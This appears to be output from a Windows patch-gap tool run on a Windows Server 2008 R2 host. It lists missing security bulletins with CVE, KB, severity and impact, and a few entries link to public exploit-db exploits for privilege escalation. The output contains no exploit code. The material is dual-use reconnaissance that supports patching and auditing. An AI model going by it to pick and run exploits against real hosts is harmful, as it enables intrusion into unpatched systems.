Title: Vulnerability in TCP/IP Could Allow Denial of Service
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Denial of Service
Exploit: n/a

Date: 20130212
CVE: CVE-2013-0076
KB: KB2790113
Title: Vulnerability in Windows Client/Server Run-time Subsystem (CSRSS) Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20120214
CVE: CVE-2012-0148
KB: KB2645640
Title: Vulnerabilities in Ancillary Function Driver Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20101012
CVE: CVE-2010-1263
KB: KB979687
Title: Vulnerability in COM Validation in Windows Shell and WordPad Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: WordPad
Severity: Important
Impact: Remote Code Execution
Exploit: n/a

Date: 20101012
CVE: CVE-2010-1263
KB: KB979688
Title: Vulnerability in COM Validation in Windows Shell and WordPad Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Windows Shell
Severity: Important
Impact: Remote Code Execution
Exploit: n/a

Date: 20101012
CVE: CVE-2010-2745
KB: KB2378111
Title: Vulnerability in Windows Media Player Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Windows Media Player 12
Severity: Important
Impact: Remote Code Execution
Exploit: n/a

Date: 20101012
CVE: CVE-2010-2746
KB: KB2296011
Title: Vulnerability in Windows Common Control Library Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Remote Code Execution
Exploit: n/a

Date: 20101214
CVE: CVE-2010-2742
KB: KB2207559
Title: Vulnerability in Windows Netlogon Service Could Allow Denial of Service
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Denial of Service
Exploit: n/a

Date: 20100209
CVE: CVE-2010-0026
KB: KB977894
Title: Vulnerability in Windows Server 2008 Hyper-V Could Allow Denial of Service
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Denial of Service
Exploit: n/a

Date: 20100413
CVE: CVE-2010-0024
KB: KB976323
Title: Vulnerabilities in Microsoft Exchange and Windows SMTP Service Could Allow Denial of Service
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Denial of Service
Exploit: n/a

Date: 20100413
CVE: CVE-2010-0025
KB: KB976323
Title: Vulnerabilities in Microsoft Exchange and Windows SMTP Service Could Allow Denial of Service
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Denial of Service
Exploit: n/a

Date: 20120814
CVE: CVE-2012-1852
KB: KB2712808
Title: Vulnerabilities in Windows Networking Components Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120814
CVE: CVE-2012-1852
KB: KB2705219
Title: Vulnerabilities in Windows Networking Components Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120814
CVE: CVE-2012-1853
KB: KB2712808
Title: Vulnerabilities in Windows Networking Components Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120814
CVE: CVE-2012-1853
KB: KB2705219
Title: Vulnerabilities in Windows Networking Components Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120814
CVE: CVE-2012-1850
KB: KB2712808
Title: Vulnerabilities in Windows Networking Components Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120814
CVE: CVE-2012-1850
KB: KB2705219
Title: Vulnerabilities in Windows Networking Components Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120814
CVE: CVE-2012-1851
KB: KB2712808
Title: Vulnerabilities in Windows Networking Components Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120814
CVE: CVE-2012-1851
KB: KB2705219
Title: Vulnerabilities in Windows Networking Components Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20101012
CVE: CVE-2010-3223
KB: KB2294255
Title: Vulnerability in Windows Shared Cluster Disks Could Allow Tampering
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Moderate
Impact: Tampering
Exploit: n/a

Date: 20101012
CVE: CVE-2010-3227
KB: KB2387149
Title: Vulnerability in Microsoft Foundation Classes Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Moderate
Impact: Remote Code Execution
Exploit: http://www.exploit-db.com/exploits/13921/

Date: 20120214
CVE: CVE-2012-0150
KB: KB2654428
Title: Vulnerability in C Run-Time Library Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120412
CVE: CVE-2012-0151
KB: KB2653956
Title: Vulnerability in Windows Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120313
CVE: CVE-2012-0152
KB: KB2667402
Title: Vulnerabilities in Remote Desktop Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120313
CVE: CVE-2012-0152
KB: KB2621440
Title: Vulnerabilities in Remote Desktop Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120508
CVE: CVE-2012-0159
KB: KB2659262
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120508
CVE: CVE-2012-0159
KB: KB2656410
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120508
CVE: CVE-2012-0159
KB: KB2676562
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120110
CVE: CVE-2012-0013
KB: KB2584146
Title: Vulnerability in Microsoft Windows Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Remote Code Execution
Exploit: n/a

Date: 20130108
CVE: CVE-2013-0008
KB: KB2778930
Title: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: http://www.exploit-db.com/exploits/24485

Date: 20130108
CVE: CVE-2013-0005
KB: KB2736418
Title: Vulnerability in Open Data Protocol Could Allow Denial of Service
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Important
Impact: Denial of Service
Exploit: n/a

Date: 20130108
CVE: CVE-2013-0004
KB: KB2742598
Title: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20130108
CVE: CVE-2013-0004
KB: KB2756920
Title: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20130108
CVE: CVE-2013-0007
KB: KB2758694
Title: Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft XML Core Services 4.0
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20130108
CVE: CVE-2013-0007
KB: KB2757638
Title: Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft XML Core Services 3.0
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20130108
CVE: CVE-2013-0007
KB: KB2757638
Title: Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft XML Core Services 6.0
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20130108
CVE: CVE-2013-0006
KB: KB2758694
Title: Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft XML Core Services 4.0
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20130108
CVE: CVE-2013-0006
KB: KB2757638
Title: Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft XML Core Services 3.0
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20130108
CVE: CVE-2013-0006
KB: KB2757638
Title: Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft XML Core Services 6.0
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20130108
CVE: CVE-2013-0001
KB: KB2742598
Title: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20130108
CVE: CVE-2013-0001
KB: KB2756920
Title: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20121211
CVE: CVE-2012-4786
KB: KB2753842
Title: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20130108
CVE: CVE-2013-0002
KB: KB2742598
Title: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20130108
CVE: CVE-2013-0002
KB: KB2756920
Title: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20100810
CVE: CVE-2010-2555
KB: KB982799
Title: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20100112
CVE: CVE-2010-0018
KB: KB972270
Title: Vulnerability in the Embedded OpenType Font Engine Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20111011
CVE: CVE-2011-1247
KB: KB2564958
Title: Vulnerability in Microsoft Active Accessibility Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Remote Code Execution
Exploit: n/a

Date: 20130409
CVE: CVE-2013-1284
KB: KB2813170
Title: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20130312
CVE: CVE-2013-1285
KB: KB2807986
Title: Vulnerabilities in Kernel-Mode Drivers Could Allow Elevation Of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20130312
CVE: CVE-2013-1286
KB: KB2807986
Title: Vulnerabilities in Kernel-Mode Drivers Could Allow Elevation Of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20130312
CVE: CVE-2013-1287
KB: KB2807986
Title: Vulnerabilities in Kernel-Mode Drivers Could Allow Elevation Of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20130212
CVE: CVE-2013-1281
KB: KB2790978
Title: Vulnerability in NFS Server Could Allow Denial of Service
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Denial of Service
Exploit: n/a

Date: 20130409
CVE: CVE-2013-1282
KB: KB2772930
Title: Vulnerability in Active Directory Could Lead to Denial of Service
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Active Directory Services
Severity: Important
Impact: Denial of Service
Exploit: n/a

Date: 20130409
CVE: CVE-2013-1282
KB: KB2772930
Title: Vulnerability in Active Directory Could Lead to Denial of Service
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Active Directory Lightweight Directory Services
Severity: Important
Impact: Denial of Service
Exploit: n/a

Date: 20130409
CVE: CVE-2013-1283
KB: KB2840149
Title: Vulnerabilities in Kernel-Mode Driver Could Allow Elevation Of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20130409
CVE: CVE-2013-1283
KB: KB2808735
Title: Vulnerabilities in Kernel-Mode Driver Could Allow Elevation Of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20110208
CVE: CVE-2011-0043
KB: KB2425227
Title: Vulnerabilities in Kerberos Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20110308
CVE: CVE-2011-0042
KB: KB2479943
Title: Vulnerabilities in Windows Media Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20110208
CVE: CVE-2011-0045
KB: KB2393802
Title: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20120313
CVE: CVE-2012-0002
KB: KB2667402
Title: Vulnerabilities in Remote Desktop Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120313
CVE: CVE-2012-0002
KB: KB2621440
Title: Vulnerabilities in Remote Desktop Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120110
CVE: CVE-2012-0003
KB: KB2631813
Title: Vulnerabilities in Windows Media Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: DirectShow
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120110
CVE: CVE-2012-0001
KB: KB2644615
Title: Vulnerability in Windows Kernel Could Allow Security Feature Bypass
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Security Feature Bypass
Exploit: n/a

Date: 20120313
CVE: CVE-2012-0006
KB: KB2647170
Title: Vulnerability in DNS Server Could Allow Denial of Service
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Denial of Service
Exploit: n/a

Date: 20120214
CVE: CVE-2010-5082
KB: KB2643719
Title: Vulnerability in Color Control Panel Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Remote Code Execution
Exploit: n/a

Date: 20120110
CVE: CVE-2012-0004
KB: KB2631813
Title: Vulnerabilities in Windows Media Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: DirectShow
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20101012
CVE: CVE-2010-1883
KB: KB982132
Title: Vulnerability in the Embedded OpenType Font Engine Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20100608
CVE: CVE-2010-1880
KB: KB979482
Title: Vulnerabilities in Media Decompression Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Asycfilt.dll (COM component)
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20100608
CVE: CVE-2010-1256
KB: KB982666
Title: Vulnerability in Internet Information Services Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft Internet Information Services 7.5
Severity: Important
Impact: Remote Code Execution
Exploit: n/a

Date: 20130108
CVE: CVE-2013-0013
KB: KB2785220
Title: Vulnerability in Microsoft Windows Could Allow Security Feature Bypass
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Security Feature Bypass
Exploit: n/a

Date: 20100413
CVE: CVE-2010-0486
KB: KB979309
Title: Vulnerabilities in Windows Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Cabinet File Viewer Shell Extension 6.1
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20130108
CVE: CVE-2013-0011
KB: KB2769369
Title: Vulnerability in Windows Print Spooler Components Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120710
CVE: CVE-2012-1870
KB: KB2655992
Title: Vulnerability in TLS Could Allow Information Disclosure
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Information Disclosure
Exploit: n/a

Date: 20101214
CVE: CVE-2010-3961
KB: KB2442962
Title: Vulnerability in Consent User Interface Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20100209
CVE: CVE-2010-0250
KB: KB975560
Title: Vulnerability in Microsoft DirectShow Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft DirectX
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20101214
CVE: CVE-2010-3966
KB: KB2385678
Title: Vulnerability in Microsoft Windows Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Remote Code Execution
Exploit: n/a

Date: 20100914
CVE: CVE-2010-2731
KB: KB2124261
Title: Vulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft Internet Information Services 7.5
Severity: Important
Impact: Remote Code Execution
Exploit: n/a

Date: 20100914
CVE: CVE-2010-2731
KB: KB2271195
Title: Vulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft Internet Information Services 7.5
Severity: Important
Impact: Remote Code Execution
Exploit: n/a

Date: 20100413
CVE: CVE-2010-0487
KB: KB979309
Title: Vulnerabilities in Windows Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Cabinet File Viewer Shell Extension 6.1
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120710
CVE: CVE-2012-1891
KB: KB2698365
Title: Vulnerability in Microsoft Data Access Components Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Windows Data Access Components 6.0
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20121113
CVE: CVE-2012-1896
KB: KB2729451
Title: Vulnerabilities in .NET Framework Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20100914
CVE: CVE-2010-1899
KB: KB2124261
Title: Vulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft Internet Information Services 7.5
Severity: Important
Impact: Remote Code Execution
Exploit: n/a

Date: 20100914
CVE: CVE-2010-1899
KB: KB2271195
Title: Vulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft Internet Information Services 7.5
Severity: Important
Impact: Remote Code Execution
Exploit: n/a

Date: 20121113
CVE: CVE-2012-1895
KB: KB2729451
Title: Vulnerabilities in .NET Framework Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20110809
CVE: CVE-2011-1975
KB: KB2560656
Title: Vulnerability in Data Access Components Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Remote Code Execution
Exploit: n/a

Date: 20110809
CVE: CVE-2011-1977
KB: KB2487367
Title: Vulnerability in Microsoft Chart Control Could Allow Information Disclosure
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 4
Severity: Important
Impact: Information Disclosure
Exploit: n/a

Date: 20110208
CVE: CVE-2010-4398
KB: KB2393802
Title: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploits: http://www.exploit-db.com/bypassing-uac-with-user-privilege-under-windows-vista7-mirror/, http://www.exploit-db.com/exploits/15609/

Date: 20111229
CVE: CVE-2011-3414
KB: KB2656355
Title: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Critical
Impact: Elevation of Privilege
Exploit: n/a

Date: 20111229
CVE: CVE-2011-3417
KB: KB2656355
Title: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Critical
Impact: Elevation of Privilege
Exploit: n/a

Date: 20111229
CVE: CVE-2011-3416
KB: KB2656355
Title: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Critical
Impact: Elevation of Privilege
Exploit: n/a

Date: 20110712
CVE: CVE-2011-1870
KB: KB2507938
Title: Vulnerabilities in Windows Client/Server Run-time Subsystem Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20110614
CVE: CVE-2011-1872
KB: KB2525835
Title: Vulnerability in Hyper-V Could Allow Denial of Service
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Denial of Service
Exploit: n/a

Date: 20120508
CVE: CVE-2012-0178
KB: KB2690533
Title: Vulnerability in Windows Partition Manager Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20110614
CVE: CVE-2011-1268
KB: KB2536276
Title: Vulnerability in SMB Client Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20111213
CVE: CVE-2011-3397
KB: KB2618451
Title: Cumulative Security Update of ActiveX Kill Bits
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20110614
CVE: CVE-2011-1264
KB: KB2518295
Title: Vulnerability in Active Directory Certificate Services Web Enrollment Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20110614
CVE: CVE-2011-1267
KB: KB2536275
Title: Vulnerability in SMB Server Could Allow Denial of Service
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Denial of Service
Exploit: n/a

Date: 20110809
CVE: CVE-2011-1263
KB: KB2546250
Title: Vulnerability in Remote Desktop Web Access Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20121113
CVE: CVE-2012-2519
KB: KB2729451
Title: Vulnerabilities in .NET Framework Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20100810
CVE: CVE-2010-2561
KB: KB2079403
Title: Vulnerability in Microsoft XML Core Services Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft XML Core Services 3.0
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

[+] Missing patches: 108
- KB2656410: patches 10 vulnerabilities
- KB2676562: patches 10 vulnerabilities
- KB2659262: patches 10 vulnerabilities
- KB2817183: patches 6 vulnerabilities
- KB2507938: patches 5 vulnerabilities
- KB2729451: patches 5 vulnerabilities
- KB2840149: patches 4 vulnerabilities
- KB2705219: patches 4 vulnerabilities
- KB2742598: patches 4 vulnerabilities
- KB2757638: patches 4 vulnerabilities
- KB2712808: patches 4 vulnerabilities
- KB2756920: patches 4 vulnerabilities
- KB2808735: patches 4 vulnerabilities
- KB2807986: patches 3 vulnerabilities
- KB954430: patches 3 vulnerabilities
- KB2271195: patches 3 vulnerabilities
- KB2124261: patches 3 vulnerabilities
- KB2656355: patches 3 vulnerabilities
- KB2506212: patches 2 vulnerabilities
- KB2706045: patches 2 vulnerabilities
- KB2604114: patches 2 vulnerabilities
- KB2393802: patches 2 vulnerabilities
- KB2753842: patches 2 vulnerabilities
- KB2645640: patches 2 vulnerabilities
- KB2758694: patches 2 vulnerabilities
- KB2479943: patches 2 vulnerabilities
- KB2709715: patches 2 vulnerabilities
- KB2719177: patches 2 vulnerabilities
- KB982799: patches 2 vulnerabilities
- KB976323: patches 2 vulnerabilities
- KB2419640: patches 2 vulnerabilities
- KB979309: patches 2 vulnerabilities
- KB979482: patches 2 vulnerabilities
- KB974571: patches 2 vulnerabilities
- KB2621440: patches 2 vulnerabilities
- KB2727528: patches 2 vulnerabilities
- KB2535512: patches 2 vulnerabilities
- KB2475792: patches 2 vulnerabilities
- KB2716513: patches 2 vulnerabilities
- KB2813170: patches 2 vulnerabilities
- KB2631813: patches 2 vulnerabilities
- KB2719033: patches 2 vulnerabilities
- KB2667402: patches 2 vulnerabilities
- KB2772930: patches 2 vulnerabilities
- KB2425227: patches 2 vulnerabilities
- KB2790655: patches 1 vulnerability
- KB2653956: patches 1 vulnerability
- KB2525835: patches 1 vulnerability
- KB2618451: patches 1 vulnerability
- KB2789644: patches 1 vulnerability
- KB2483614: patches 1 vulnerability
- KB2736418: patches 1 vulnerability
- KB2770660: patches 1 vulnerability
- KB2690533: patches 1 vulnerability
- KB2785220: patches 1 vulnerability
- KB2758857: patches 1 vulnerability
- KB2621146: patches 1 vulnerability
- KB2207559: patches 1 vulnerability
- KB2546250: patches 1 vulnerability
- KB2564958: patches 1 vulnerability
- KB975560: patches 1 vulnerability
- KB979687: patches 1 vulnerability
- KB2423089: patches 1 vulnerability
- KB979688: patches 1 vulnerability
- KB2769369: patches 1 vulnerability
- KB2560656: patches 1 vulnerability
- KB2207566: patches 1 vulnerability
- KB2691442: patches 1 vulnerability
- KB2518295: patches 1 vulnerability
- KB2385678: patches 1 vulnerability
- KB2571621: patches 1 vulnerability
- KB2305420: patches 1 vulnerability
- KB2765809: patches 1 vulnerability
- KB2378111: patches 1 vulnerability
- KB978542: patches 1 vulnerability
- KB2570947: patches 1 vulnerability
- KB2536275: patches 1 vulnerability
- KB2536276: patches 1 vulnerability
- KB2487367: patches 1 vulnerability
- KB975467: patches 1 vulnerability
- KB2813347: patches 1 vulnerability
- KB2387149: patches 1 vulnerability
- KB2790113: patches 1 vulnerability
- KB2790978: patches 1 vulnerability
- KB2442962: patches 1 vulnerability
- KB972270: patches 1 vulnerability
- KB2294255: patches 1 vulnerability
- KB2347290: patches 1 vulnerability
- KB2743555: patches 1 vulnerability
